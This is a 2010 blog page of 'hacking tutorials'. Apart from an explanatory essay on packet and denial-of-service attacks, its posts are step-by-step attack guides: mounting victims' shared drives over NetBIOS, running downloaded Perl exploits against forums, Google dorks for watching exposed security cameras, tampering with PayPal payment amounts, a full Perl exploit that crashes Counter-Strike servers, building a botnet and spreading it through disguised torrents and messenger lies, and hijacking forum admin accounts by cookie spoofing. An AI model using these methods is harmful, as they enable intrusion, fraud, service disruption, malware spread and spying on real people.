Latest Additions

Image and video hosting by TinyPic Image and video hosting by TinyPic Image and video hosting by TinyPic Image and video hosting by TinyPic
Showing posts with label Hacking tutorials. Show all posts
Showing posts with label Hacking tutorials. Show all posts

Wednesday, March 17, 2010

Packet Attacks

PACKET ATTACKS - VERSION 1.1
Let me start by saying the internet is full of wonderful tools and papers like this one. Alot of these things can help you
increase your knowledge, perhaps your job or more. But just as easily as you can learn from them, people read into them to
much and decide to harm other peoples work for no apparent reason. Let it be known that is in no way the purpose of this
paper. A true hacker is one who strives to attain the answers for themselves through curiosity. Its the path we take to
those answers that makes us hackers, not destruction of other peoples work. So with that said, please enjoy my work, as I
have enjoyed writing it.
The flow of data has always captured my interest. Just how does it work, how can we dissect it and use it to our advantage.
Well I have spent a long time studying all of this, and that is why I wrote this paper. It's a collection of run on s
entences on different packet attacks and how they work. Now we all know you can learn all you ever wanted to know about the
specifications of a protocol by reading its 30 page RFC document. But that is the protocol according to design, in the wild
its a different story all together. 'Packet Attacks' covers everything from basic DOS attacks to TCP/IP hijacking. Hence the
name "Packet Attacks". This paper also focuses not just on attacks but practical ways to prevent such attacks and ideas on
new methods to help us stop them and secure our networks.
Introduction:
TCP/IP Packet Switching Networks
OSI MODEL
---Chapter 1.---
Section a.
Introduction to DDOS/DOS & Packet Attacks
Section b.
How attacks are crafted
---Chapter 2.---
Section a. (attacks)
ICMP
Smurf
SYN/ACK
UDP
DNS
ARP
DrDOS
Special Bot / Trojans
Worm DOS
Unicode ping flood (new!)
Section b.
Phasing
Section c. (hacks)
TCP hijacking
Sniffing
Scans
Information gathering / Footprinting
Section d.
Defense against these attacks
Attack Detection
Intrusion Detection
Section e.
IPSEC
NAT as a means of security
---Chapter 3.---
Section a.
The future of TCP/IP as a means of using IPv6
---Chapter 4. ---
Section a.
New security application / protocol
-----
Introduction.
Well I assume most of you reading this paper already have a good understanding of TCP/IP and how it works so I wont get to
much into detail on that, but I will scrape the surface on the parts we NEED to discuss. The internet is a MASSIVE web of
machines all connected to one another through a series of hardware devices known as routers, switches, hubs, bridges and
lots more. All of these devices (although some are smarter then others) push along packets. Our operating systems and
applications craft these packets in order to send data to one another over the wire. Each packet, although varying in size,
carries a small bit of data to and from one host to another. Each packet must also carry its own personal information such
as where it came from and where its headed. Of course there is a lot more to a packet then just this information. But as far
as attacks go this is the crucial information we need to look at. Now there are many many different types of protocols that
craft many different types of packets. And they are all read differently when they are received at the other end. Where as
an ARP packet may tell a host who has this MAC address on this subnet, a TCP packet might transfer the last few bits in that
MP3 your downloading. Regardless the data, all of these packets use the same wire to move to and from locations. I couldn't
possibly discuss every protocol and packet structure in this one paper. The average end user takes for granted all of this
running in the background while they surf the net. Most people dont understand the complexity of this internet we are all so
familiar with, the chat rooms etc. But there are people who do, and there are people who take advantage of that. Reverse
engineering has led to the creation of attacks using the basic fundamentals these protocols rely on. And since TCP/IP is so
embedded in our infrastructure we must adapt and learn to defend each new attack.
OSI MODEL
Open Systems Interconnection model, is a seven layered networking design. Its an industry standard that defines exactly how
data is transffered between protocol to protocol. Not every protocol follows the OSI model exactly and some do. TCP the
internets main mode of data transport does not follow it exactly. Let me take you through a brief over view of the OSI model.
Layer Seven : Application Layer
This layer is obviously application specific, it provides everything from authentication to email to ftp and telnet, the
list goes on. Its specifically for end user processes, what we input into our applications we can see on our screens.
Layer Six : Presentation Layer
This layer changes and possibly encrypts the data so that the application layer can understand it. (you will understand what
this means in a few minutes)
Layer Five : Session Layer
Think of this layer as Establishment, Control and Termination of the sessions formed by the
application(client) to a remote host(server).
Layer Four : Transport Layer
This layer is responsible for the invisible transfer of data between host to host. It is there to ensure all data transfer
goes accordingly. The protocols used are, UDP and TCP.
Layer Three : Network Layer
This layer is for error correction, packet sequencing, and for transmitting data from node to node. Addressing is also
another function of this layer in inter-networking.
Layer Two : Data Link Layer
This layer decodes and encodes packets into bits so they are ready for the physical layer. It also handles error correction
in the physical layer. This layer is also divided into two different sub-layers. The LLC (logical link control) and MAC
(media access control) sub layers. The LLC sub layer provides control for frame synchronization and error checking. The MAC
sub layer controls how a computer on your network has access to data.
Layer One : Physical Layer
This layer is the actual movement of the data. Using electrical impulse or some other form of data movement is pushes the
bit stream towards the other host. This layer is the hardware level, the ethernet card, the wire etc. There are many
protocols within this layer.
You may ask yourself why I listed these from 7 to 1. Well I did to show you how the OSI model really works. Layer Seven
really comes first, the end user types something into his instant messenger (for example) and the data flows down through
the OSI model being encapsulated and changed at every level it has to be changed or corrected at. The data travels the wire
and at the other end it moves back up the OSI model all the way back up to layer seven where the other host can read it in
the original form it was sent. So theres a VERY basic understanding of the OSI model and how it works to transmit data from
host to host. There is alot more protocols and parts to the OSI model but this basic representation should provide a firm
understanding.
To understand all of this more in depth please get your hands on a few RFC (request for comment) documents and start reading.
Because it will take you a very long time to understand exactly how TCP/IP works. If your very knowledgeable in the way
TCP/IP works then this paper should make alot of sense to you, perhaps even bore you! On the other hand if you dont
understand TCP/IP as well as you would like to, you still might get something out of this. I try and explain all of the
technical writing as easily as I can. Feel free to email me if you have a question or comment. Thanks
Data_Clast
---------------------------------------------------------------------------------------
Chapter 1.
Section a.
The most common attack on the internet today is a denial of service attack. There are many programs on the internet today
that will assist anyone in crafting one of these attacks. The sad part is for as easy as they are to make their power can be
destructive when used properly. No matter what kind of packet attack it may be most are based on the same principal, volume.
Thousand and thousands of spoofed packets will eat up network resources within minutes, choking and essentially 'killing'
any network. There are many types of packet attacks. Some are more sophisticated then others. I will also talk about TCP/IP
hijacking and your typical port and vulnerability scans among other things.
Why do people launch these attacks? How are they launched? How do they exactly (technically speaking) 'choke a network'?!
Hold tight im getting to that. The lower end of these attacks are usually launched by what the hacker community calls a
script kiddie. You see a hacker isnt a mindless web defacing juvenile (please see the mentors manifesto). A hacker is a
person of true intellect and would never craft such an attack for no reason. But these lower end attacks are usually
launched at peoples individual machines. Their IP address's may come from an IRC chat room, yahoo messenger, AOL, ICQ, or
whatever other messenger you might use. Although not as sophisticated, these 'lower end' attacks can still knock an
individual machine offline in minutes. The slightly more advanced attacks may be aimed at a business competitor in order to
slow their sales or disrupt their outgoing internet connection. Whatever the reason may be they are usually launched for a
reason. Attacking a box for no reason is typically useless and will only take up your own bandwidth.
The more sophisticated attacks are aimed at government and root points of the internet. Such as the attacks on the root DNS
servers in October of 2002. These attacks were sophisticated in the way they were crafted. The attacks lasted for over an
hour and successfully took out a few of the servers. If the attack had lasted just a few more minutes who knows the damage
it could have caused. The possibility of the authorities solving these attacks and apprehending the offenders is slim to
none because they are created and launched by skilled malicious individuals. They were also distributed denial of service
attacks. Which means the 'zombie' machines that attacked the servers were spread out all over the world. We will touch more
on that later though.
Section b.
You will learn more about how these individual attacks are crafted and how they work later in this paper but this is
small introduction so you can get a vague idea. Creating spoofed packets requires an open socket. This socket binds to an
IP and a port and allows you to inject a packet onto the wire or accept any incoming packets to that IP and port. *NIX
openly supports open socket programming (many tutorials on this type of programming). Which means you can code programs that
create packets and then inject them into the network with ease. An example of this would be a program called "SENDIP" which
allows you to create custom packets, and it supports many protocols (another good program is nemesis). I have written a few
tutorials using SENDIP, I think its a great program for both advanced and new network engineers to use. It will help you
learn about packet structure and the different protocols it supports. Microsoft is not an open source company, which pretty
much makes it even harder to find help in creating these sorts of programs for Windows. But it is possible to craft these
attacks from within a Windows environment. Its referred to 'Winsock' programming. Infact most of these DDOS attacks are
because of vulnerable Windows boxes out on the net. They are sitting ducks for trojan horses and other programs that craft
these attacks on servers when commanded from a client program to do so. Most end users do not understand security and how
easy it is to break into someones home computer, so they lack firewalls and virus scanners. This leads to many zombie
machines available to hackers disposal on the net. All one has to do is scan a class C subnet for open trojan ports and
hack their way into those trojans and use them as a backdoor, another zombie is created for attacking remote targets. Almost
every program that interacts with TCP/IP generates packets to and from places, this is valid traffic. As you read you will
distinguish the difference between valid and non valid, as it easy pretty easy to understand what I am explaining when I say
"attack". When creating an open socket and crafting spoofed packets these programs tell the kernel they are going to
construct their own IP headers. Usually this information is put on by the kernel before exiting the machine. But in this
instance we are telling the kernel we want to specify our own information. Not all operating systems will allow this. And
no I dont have a detailed list of which do and which dont. Most of the experiments I have conducted on my network used
different versions of RedHat Linux, Mandrake Linux, and Windows XP.
Chapter 2.
Section a.
There are several different types of packet attacks. Theres the simple brute flood of ICMP packets which floods a network
and eats up all the available bandwidth. And then there are more sophisticated attacks like the Smurf or SYN/ACK attack.
All of these attacks target different things. While the SMURF attack may target the general network its attacking, the
SYN/ACK attack targets a specific host or service running on a host. We also must take into consideration when a target is
attacked it may not be the only machine affected. There are many routers and other boxes transfering the data between point
A and point B. Other peoples legitimate data is flowing between them, and may be disrupted by the packet flood. Even a top
of the line router can only handle so much data. And unfortunately it is very easy to attain soure code for these attacks
all over the web. Lets take a more detailed look at each attack.
ICMP brute flood attack.
ICMP works on top of TCP. The ICMP protocol is simple yet very effective. Its used for error correcting and testing network
connectivity. Your average PING program uses ICMP packets to test network connectivity. By sending a small amount of
arbitrary data in an ECHO_REQUEST packet it waits for a reply from the target host, simple right? A typical ICMP packet is
called an ECHO_REQUEST. You send 4 or 5 of these at a target machine and when it arrives there it requests an ECHO_REPLY.
Thats when everything is done according to design. If you want more info on an ICMP packet and how it works then read my
tutorial on that!
http://www.theory-x.org/dataclast/_content/MPS.txt
In this attack the source IP address is spoofed. So now hundreds, thousands of ECHO_REQUEST packets rush towards their
destination. They reach point B, request an ECHO_REPLY for every ECHO_REQUEST sent. Point B says OK, reads the source IP.
The source IP ends up being unreachable. But point B is waiting a small amount of time (milliseconds) to determine that for
every packet thats hitting it. It will be a few more moments before the process relinquishes this small bit of memory back
to the system. This adds up to a great deal of packets and memory allocation building up. Now if these packets are coming
from multiple source zombies (DDOS) then this means there each coming from different routes. So even if one ISP stops one
attack, there are still many more zombie machines attacking the victim. All of this is eating up time and bandwidth, because
with every millisecond that passes more and more bandwidth is being taken up. Eventually point B can no longer keep up with
the ECHO_REQUESTS and his connection is completely flooded and of no use. On an unprotected system or router this attack
can be very consuming. This attack is also sometimes referred to a bandwidth attack. Even if the target is running an
advanced firewall it cannot protect the wire it connected to from being flooded with packets. There have been changes in
this attack as well. On the net there are what we call amplifiers. On every network there are the network and subnet
addresses. In many default configurations when you ping either one of these addresses they multiply the echo requests by 4
or more. So a zombie would attack a vulnerable network (.0) or subnet address (.255) with a spoofed source IP, being the
victims real IP. So even tho the traffic becomes valid as far as IP addresses go. The victim gets bombarded with massive
ECHO_REPLY packets. You will see more of this description in other attacks, as it works for some of those to.
[zombie machine] -->ICMP ECHO_REQUEST (source IP = 1.1.1.1) -->-->--> [target]
[??????????????] ICMP ECHO_REPLY (destination 1.1.1.1 ?)<-- [target]
Hopefully that simple drawing shows you exactly how this attack works. Its very very simple, massive ICMP packets with
spoofed address's taking up network resources. The simplest of attacks.
Smurf attack.
(first part is repeat from ICMP attack) There have been changes in the ICMP attack. On the net there are what we call
amplifiers. On every network there are the network and subnet addresses. In many default configurations when you ping either
one of these addresses they multiply the echo requests by 4 or more. So a zombie would attack a vulnerable network (.0) or
subnet address (.255) with a spoofed source IP, being the victims real IP. So even tho the traffic becomes valid as far as
IP addresses go. The victim gets bombarded with massive ECHO_REPLY packets. You will see more of this description in other
attacks, as it works for those to.
You can try this attack on your home network by simply opening a packet sniffer on each machine that is on. Pick a machine,
any machine and ping your broadcast address. Mine is 192.168.0.255 Immediately you see each machine receiving a broadcast
packet. Now imagine its several hundred and each one has a spoofed source IP address. Its a brute ICMP attack on a massive
scale, this possibilities to this attack are endless. You could easily implement this attack in anyway you chose. You could
spoof the victims real IP as your source IP and create massive volumes of legit ECHO_REPLY packets. Even though its valid
traffic, its 4x or more times the normal load of valid traffic. This consumes the connection and valid traffic cant pass,
or passes so slowly it makes no difference to the end user.
[zombie machine] --> ICMP ECHO_REQUEST source ip = 10.2.2.2 --> to: broadcast router 4.1.0.255 (router multiplies the
ECHO_REPLY packets by 4x! --> --> --> --> [victim 10.2.2.2]
SYN/ACK attack.
The SYN/ACK attack is a very powerful attack. SYN/ACK packets are also used in TCP hijacking, and the TCP/IP three way
handshake. When an application wants to connect with a server somewhere over the net via a TCP connection (connection vs
connectionless data transfer (UDP)) it first sends a SYN packet. The SYN packet tells the target machine he wants to make
a connection on a certain specified port, and then send data. When the target machine read the SYN packet it replies to
the original host with a SYN packet of his own and an ACK (acknowledgement) packet with sequence and ack numbers. These SEQ
and ACK numbers are used to synchronize the data transfer, incase one or two packets gets lost or slowed down along its
route, it can be assembled again in the correct order. The orignal machine replies again with another SYN ACK packet
combination acknowledging the sequencing numbers and then it starts to send data. When it creates this connection a tiny
piece of memory is allocated to hold the connection while the packets are in route. Now a SYN/ACK attack would consist of
spoofing the source IP address on the original SYN packet. The target receives the request for a connection, reads the
spoofed source IP and tries to send its own SYN and ACK packet to a destination that does not exist. Most operating systems
will continue to send SYN/ACK packets if they dont receive a reply as a method of error correction and guaranteed data
delivery. Just like in the ICMP attack the machine has to wait a few milliseconds before abandoning all hope of reaching
the machine. So these tiny allocated spaces of memory are building up with every spoofed packet that arrives at the target.
This attack is very powerful and can disable a service running on the target machine in a matter of minutes. Not to mention
all the available bandwidth is eaten with thousands and thousands of spoofed packets. So there is the SYN/ACK attack in a
brief description.
[zombie machine] --> SYN packet (source IP 1.1.1.1, port = 23 telnet) (seq = 100) --> [target]
[??????????????] <-- SYN/ACK packets sent (seq = 300) (ack = 101) <-- [target]
As you can see from the simple drawing above the target machine has no idea who is sending the SYN packets and the telnet
server he is running on port 23 would most likely crash. At best the telnet daemon would not allow any other legitimate
traffic through, as it could not gather enough resources (memory, bandwidth) to make the connection due to all the spoofed
packets.
Another use of this attack is to disconnect a user from their current TCP session. By spoofing SYN/ACK packets to a server
a client is currently using. An attacker would place a "FIN" flag in the packets, this tells the server the client is done
sending data. Client uses his connection and attacker walks away undetected, because it only took one packet to accomplish
this.
UDP attack
UDP is a protocol that is used to transfer data. Short for USER DATAGRAM PROTOCOL. UDP offers very little error correction
and is used as an alternative means for data transfer. It doesn't require the 3 way handshake such as the SYN/ACK method,
so its initial attack may not take down a remote daemon as quickly. UDP is generally used to broadcast messages over a
network. A UDP attack would consist of spoofing the source IP addresses and specifying a port number like in the SYN attack
above. UDP packets are generally large because they are usually used on closed 100mb subnets (LANS). So an attack would set
flags in the packets and fragment them (break them up and flag where in the packet they broke, so they can be reassembled
on the receiving end). For example in Windows 2000 there was a remote UDP DOS exploit that used the IKE service running on
port 500. All an attacker had to do was connect to port 500 on a random machine with that port open. Start sending massive
UDP packets (above 500 bytes) to that service and the CPU usage would hit 99% and the machine would lock up. The typical
ports that accept UDP packets are 7, 13, 19 and 37 on a Windows box.
DNS attack
The DNS attack is a special one. Not as easily crafted as the others, there arent that many tools readily available to the
average script kiddie to construct such an attack. The DNS protocol is used for name resolution, 216.239.35.100 = google.com,
simple as that? Well not really. A DNS attack is based on the fact that a DNS query takes very little data and bandwidth to
create, but a DNS response is much bigger. So this is how a DNS attack would look like.
10.10.10.10 = victims IP
[dns query packet (who is google.com)] --> source IP is 10.10.10.10 --> [dns server]
[dns server] --> --> --> [dns response] [dns response] [dns response] --> [victim]
As you can see the attack is sort of relayed from a legitimate DNS server. Although the DNS response packets are 'legit'
there is a massive flood of them because the DNS server that is sending them is a very good machine on a very good
connection. The end user, most likely a home pc, gets flooded with these huge DNS response packets it never asked for.
ARP attack
The arp attack is a special one, it can be used to 'hijack' a tcp connection currently in session or it can be used to
sniff the legitimate traffic on a wire other then your own. Which is a very dangerous thing in the information world we
live in today. There are a few methods of this attack. Lets say person1, attacker, and server are all on the same subnet.
Person1 and server currently have an FTP session open. Attacker sends both server and person1 an ARP packet containing an
invalid MAC address. Now both of their arp tables are messed up for atleast 30 seconds. Server and person1 cant find that
invalid MAC address so they send their data to the IP its associated with, the attacker. So in this case the attacker has a
sniffer setup and hes collecting a ton of data. Now the attacker (an advanced one at that) can issue commands as person1 to
the server. This attack takes timing and skill to pull off on the internet, but on a LAN its very easy. It only allows for
maybe 30 or so seconds of sniffing, until their arp table is constructed properly again.
DRDOS attack
A DRDOS attack uses a little of other attacks to inflict damage. This attack spoofs the source IP address of SYN packets
to the IP of the victim. It requires a third party. This is the part of the attack that makes it so easy. All it needs is
some ftp, webserver, telnet.. ANY service that will reply with an ACK packet, anywhere on the internet. Could be angelfires
free ftp servers, could be your neighbors web server running off his 233mhz compaq with IIS 4.0. It doesn't matter! The SYN
packets are sent to that services IP address and they of course reply with a steady stream of SYN/ACK packets to the victim.
Most likely directed towards an open port on the victims machine, crashing that service and the system. These attacks are
near impossible to track down. This attack is quite possibly the strongest DOS attack in my opinion. For every SYN packet
you send the middle man, it sends out up to 4 SYN/ACK combinations to the victim. And each time the victim doesn't respond
the middle man sends even more (error correction). This allows the attacker to contruct a massive attack from just one
machine with a broadband connection. There are more dangers to this attack as well, there are hundreds of thousands of FTP,
webservers and many more services running on the net today that will deflect these SYN/ACK packets at the victim. So in
theory this attack could use any number of 'middle man' servers to bombard your network with packets.
Posted by at No comments:

NetBIOS Hacking

A Guide to NetBIOS Hacking.
NetBIOS Hacking- A Hacking method in which the hacker penetrates the victim through the "Sharing Files/Printer" option in the computer. The hacker can then r00t(mount) the computers main drive or what ever drive is shared and upload/download files from it. ultimately, YOUR SCREWED .
The How-To:
First, lets assume you have the IP of the victim and his/her computer is online. To make sure he/she is online, ping him/her like so:
ping xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is the victims ip adress.
if you get a response saying:
64 bytes from 127.0.0.1: icmp_seq=23 ttl=64 time=0.092 ms
64 bytes from 127.0.0.1: icmp_seq=24 ttl=64 time=0.098 ms
64 bytes from 127.0.0.1: icmp_seq=25 ttl=64 time=0.096 ms
or the numbers can be different, their computer is online and connected to the internet.
Now, lets see if their computer drive is on share
type this in command prompt:
nbtstat -a xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is their IP
You should get an output like so
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Computer001 <03> UNIQUE
Crap <03> UNIQUE
Computer001 <00> UNIQUE
WORKGROUP <00> GROUP
Computer001 <20> UNIQUE
---------------------------------------------
Do you see the "<20>"? if you see that on the netbios table, they have sharing enabled on their computer! So far so good.
Now, lets see what disk is shared by entering this command into command prompt:
net view \\xxx.xxx.xxx.xxx where xxx.xxx.xxx.xxx is the victims IP Adress.
Now you should get a response like this:
Shared resources at \\xxx.xxx.xxx.xxx
Sharename Type Comment
______________________
TEMP Disk
C Disk
______________________
The command was completed successfully.
What we are interested in is the C disk as as we see here, the name of the disk on shared is just "C". Now we can connnect to it with out any problems hopefully.
To connect, type this in:
net use x: \\xxx.xxx.xxx.xxx\C
What this will do is try to mount the drive "C" from "xxx.xxx.xxx.xxx" which will be drive "X" on your computer. If this worked you should get:
The command was completed successfully
Now check your My Computer and it should be there!
Success!
Happy Hacking
NOTE: Some drive require a password. Your on your own there
Posted by at No comments:

Tuesday, March 16, 2010

How to use a perl exploit

How to use a perl exploit
What you will need:
ActivePerl: http://www.activestate.com/Products/ (it is easier to just download the trial, unless you want the full version)
http://www.milw0rm.com (to search for a exploit)
NotePad
Command Prompt (start>run>CMD)
=================================================================
First: Download and install ActivePerl from the link I gave you.
=================================================================
Ok, second, search on google for some forums. Make sure you find out us much about the one you want to hack as possible (e.g. the version and things). As I said, find out as much as you can about it.
=================================================================
Now, go to http://www.milw0rm.com and search for a exploit that is for your website. (e.g. MyBB 1.2.3 or something). Once you have your exploit, click the link and see if it is a perl code. To know if it is a perl code, it should have something like #!\perl\bin or something along those lines.
=================================================================
Once you have your code, copy paste everything on the sheet to NotePad. Once you have it all pasted, save it into "C:\perl\bin" (without qoutes). Make sure you save it as a .pl file. (e.g. exploit1.pl) Otherwise it will not work. You can name it whatever you want just make sure it is a .pl file.
=================================================================
Now, after you have saved your file in C:\perl\bin, goto Start>Run>CMD (Command Prompt). Type in on CMD "cd C:\perl\bin". Once you have done that, it will go into the folder pretty much on CMD. So, once you are in it, type "exploit1.pl" or whatever you named your exploit. Most of the exploits have instructions that come with it. So it is pretty much self explanitary. If you do not know what your exploit does, .
=================================================================
Posted by at No comments:

How to Snoop Security Cams

Here’s something fun to do when you’re bored. Use the code below into a search engine and see what you can come up with. You can find all sorts of stuff from cameras all over the world. Happy snooping!
  • inurl:”ViewerFrame?Mode=
  • intitle:Axis 2400 video server
  • inurl:/view.shtml
  • intitle:”Live View / - AXIS” | inurl:view/view.shtml^
  • inurl:ViewerFrame?Mode=
  • inurl:ViewerFrame?Mode=Refresh
  • inurl:axis-cgi/jpg
  • inurl:axis-cgi/mjpg (motion-JPEG)
  • inurl:view/indexFrame.shtml
  • inurl:view/index.shtml
  • inurl:view/view.shtml
  • liveapplet
  • intitle:”live view” intitle:axis
  • intitle:liveapplet
  • allintitle:”Network Camera NetworkCamera”
  • intitle:axis intitle:”video server”
  • intitle:liveapplet inurl:LvAppl
  • intitle:”EvoCam” inurl:”webcam.html”
  • intitle:”Live NetSnap Cam-Server feed”
  • intitle:”Live View / - AXIS”
  • intitle:”Live View / - AXIS 206M”
  • intitle:”Live View / - AXIS 206W”
  • intitle:”Live View / - AXIS 210?
  • inurl:indexFrame.shtml Axis
  • inurl:”MultiCameraFrame?Mode=Motion”
  • intitle:start inurl:cgistart
  • intitle:”WJ-NT104 Main Page”
  • intext:”MOBOTIX M1? intext:”Open Menu”
  • intext:”MOBOTIX M10? intext:”Open Menu”
  • intext:”MOBOTIX D10? intext:”Open Menu”
  • intitle:snc-z20 inurl:home/
  • intitle:snc-cs3 inurl:home/
  • intitle:snc-rz30 inurl:home/
  • intitle:”sony network camera snc-p1?
  • intitle:”sony network camera snc-m1?
  • site:.viewnetcam.com -www.viewnetcam.com
  • intitle:”Toshiba Network Camera” user login
  • intitle:”netcam live image”
  • intitle:”i-Catcher Console - Web Monitor”
Posted by at No comments:

How to get stuff for 0.01 Paypal Hacking

First of all you will need:
Firefox
[CODE]http://www.mozilla.org/en/products/firefox/[/CODE]
Tamper data
[CODE]https://addons.mozilla.org/en-US/firefox/addon/966[/CODE]
a Paypal account
[CODE]http://www.paypal.com[/CODE]
Ok so go to the checkout then start tamper then click Paypal link then something will pop up select tamper and on the amount and change it to 0.01 then press ok then stop tampering and pay 0.01 LOL
Youtube video about it
Say thanks if you like my post.
Posted by at No comments:

How to crash a CS 1.6 server tutorial

How to crash a CS 1.6 server
Alright so I decided to write this tut because I wanted to contribute a bit to the forums and there are many people asking how to do this. Actually, crashing a CS 1.6 server DOES NOT demand a botnet or many people attacking or logging in the server. So:
-Things to bear in mind:
1) The server you want to crash must NOT be running Steam. And this is
because all servers that run Steam have HLShield, HLGuard or other
types of shields that protect the servers from attacks of this type. So
before you continue, make sure the server does not run Steam or in
general is not Valve-secured. You can usually check this like this:
Can you see something in a green box? This means that the server is
most likely using the shield I described earlier. You can?t crash it the way
I am going to describe.
2) Sometimes if you are banned from the server or the server is password-
protected, you cant crash it.
-What you will need:
1) (Latest) version of Perl installed on your machine, I recommend
ActivePerl, but you can use Strawberry Perl too (that?s what I used  ).
2) The exploit you are going to use, located here:
http://www.milw0rm.com/exploits/1483
3) A clear mind.
4) Access to the sooo called ?cmd? or command prompt.
So lets begin.
1) Go to the link I provided earlier in this tut and copy the whole code into
notepad by pressing Ctrl-A, opening Notepad and pressing Ctrl-V to
paste it.
2) Save the file. File  Save As? Now be careful with the name of the file
and the extension. Name it whatever you like, but add ?.pl? as the
extension of the file. For example, if you are going to name it ?csdos?,
then in the name of the file you are going to type: ?csdos.pl?. Save it on
your desktop for now.
3) Move the file you just created to this path: ?C:\strawberry\perl\bin? if you
installed Strawberry Perl, or this: ?C:\perl\bin? if you chose Active Perl.
4) You?re almost done now. Go into a server and get its IP. You can do this
by right-clicking the server, ?View Server Info?. Now when you have its
IP, press the Windows Key to minimize CS and open cmd. Start  Run?
and type in: ?cmd?. A command prompt window pops up. Type in:
?cd c:\strawberry\perl\bin? (if you installed Strawberry Perl) or
?cd c:\perl\bin? (if you installed ActivePerl).
5) Now for the command syntax:
?perl [name of your file].pl [IP of the server]?
For example, if you named the file ?csdos? and the IP of the server is
215.75.156.83:27015, the command would be:
?perl csdos.pl 215.75.156.83:27015?.
6) Determine the result.
If you get something like this in the red box, then the server was crashed successfully. Congrats! If you get anything different than this, then you failed. xD
- End of my tutorial -
P.S. Don?t forget to comment and rate my tut, it took me much time to write, plus my Firefox crashed twice while i was writing it, so I wrote everything from scratch.
And feel free to ask questions.
UPDATE: This is the code you are going to use:
#!/usr/bin/perl
# Server must not be running steam. /str0ke
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos " unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
# milw0rm.com [2006-02-11]
The reason i posted it is because there seems to be some trouble and errors on executing it...
Posted by at 3 comments:

Host Booting (Botnet) Tutorial

Host Booting (Botnet) Tutorial
Ok, im going to show you guys how to, setup a private DNS, and show you how to configure/Hex your bot to connect to your host/ip, then spread it to be able to shut down someones internet. This is most commonly used on Halo2, Halo3, and other games for the Xbox360.
Also spreading is easier if you have a good binder/packer a FUD packer would work great. If you want the spreading process to be a lot easier, i recommend buying a copy of Evo Packer from SiKWoN.
1. Setting up your DNS
First go to [url]www.No-IP.com[/url] and register. Make sure you use REAL information and a real email address. After you have made an account with No-IP, go to "Add Host" Once your their you should make your host name similar to mine. 2 LETTERS and 1 NUMBER, doesnt matter what they are. Overall, should look like this :
Now click "Create Host" then your done setting up your DNS server.
2. Setting up your Bot to connect to your server.
[url]http://www.hexworkshop.com/[/url]
Download HexWorkshop. Then you'll need a blank copy of a bot
Now, once you have HexWorkshop Installed you extract the bot from the .rar file, right click the bot and click "Open with HexWorkshop" Hex workshop should come up. now hit CTRL + F, then it should bring up a screen. You want to take the drop down bar and select "Text String" and click on the bubble "Find all Instances" And you want to search for "no-ip" without the "s. Should look like this.
Once thats done, you should see down at the bottom right, letters and numbers, click on that and should show up highlights No-ip. Remember that host you made? heres where it comes in handy, you take your 2 letters and 1 number and put them where i put my ch8. but instead of ch8, you put your host name. After that go to file > Save > when it asks to make a backup, No.
3. Protecting your Bot with Armadillo.
Theres Armadillo/Settings for Protection/Patch.
Once you have that downloaded and Installed, you want to, double click on the project.arm file. it should bring up Armadillo.
Then go to Protection at the top.Then Edit Project.
Then click on "Files to Protect" then to the far right, you should see bars with boxes next to them, on the first one click the box on the right, then find your extraced 2.1 XR Bot. Select the bot. then exit out of the screen. Once done with selecting the file to protect time to protect your bot.
It will tell you when its done protecting your files. And there you go! your bot is now setup for your server and is protected so no one can get your server information.
4.Opening your ports.
1. Login to your router.
2. Port Forwarding/Applacations and Gaming
3. OPEN PORT 3070, UDP and TCP, USE THE IP OF YOUR ROUTER!
5. Spreading.
Torrents are a good way of spreading, just rename your bot, make a decent torrent name, and upload. once people download your file you will get more "Zombies" and once you have enough zombies you can make people lag out of halo games or lag people completely offline. Also if you have a massive amount of zombies, there is a chance their router/modem will fry/overheat and they will have to buy a new one.
LimeWire - P2P rename it as a song, bind it with a song. Either way, someone will download it.
MSN and AIM. Lie to people (which is gay) have them open it, and they will be your bot. I dont recommend doing this way though. Because i personally dont like screwing people over. Just help them if they need it.
Posted by at No comments:

Hacking IPB tut (with pics)

Well There are so many ways to hack "Powered by invision power board" . But Im going to use the easy one .. ok lets start
What we need?
Opera(web browser) : http://www.opera.com/download/
Perl : http://downloads.activestate.com/ActivePerl/releases/5.10.1.1007/
Exploit : http://hotfile.com/dl/32738317/f30816e/Exploit_Package.rar.html
NOTE: MAKE SURE YOU HAVE THE RIGHT VERSION OF PERL, or else youll get an error, and its a pain, trust.
Lets Start
1st you have to install Opera and perl
and after that run the Exploit with perl . and then you will get something like this
ok this will Work on
Powered by invision power board v2.1.4
Powered by invision power board v2.1.5
Powered by invision power board v2.1.6
Powered by invision power board v2.1.3
so lets find a website
goto google and type one of those in the top
and you will get bunch of sites choose one
and paste the link to forum in " Path to forum index" And click "Test forum vulnerability"
If the site isnot vulnerable, it will give something like this:
if the site is vulnerable it will give something like this :
Now change the User ID to admins ID most of times user id will be 1 or 2
if everything is good click ?Get date from database?
a hash should pop up where it says ?Returned date:? (note: you cant crack this hash you can only cookie spoof all the hash?s will be salted)
Now you have the hash ! now whats left to do is to login in with admin or whatever user you choose.
ok now you have to fucking pay attention, its not that hard.
Using Opera (just in case you forgot its your web browser (: ) First go to your vulnerable website and register enter all the information needed preferably not entering real info. ( if your not a retard )
Set a random username like : plorlt
set an email like: [email]a@hotmail.com[/email] ( it doesn?t have to be real I have a way of getting it without doing the email verify)
when it says an email has been sent to blabla just go back to the forum index and login.
When your in go to tools>advanced>cookies? now you need to find the vulnerable sites cookie you need to be logged in !
When you get to that cookie simple open the file and edit the Hash with the one you got with the exploit, and edit the member_id to whichever one you use to get the hash.
Then delete everything else in the cookie only member_id and hash is needed.
Click close and refresh the page you should be logged in as your target !
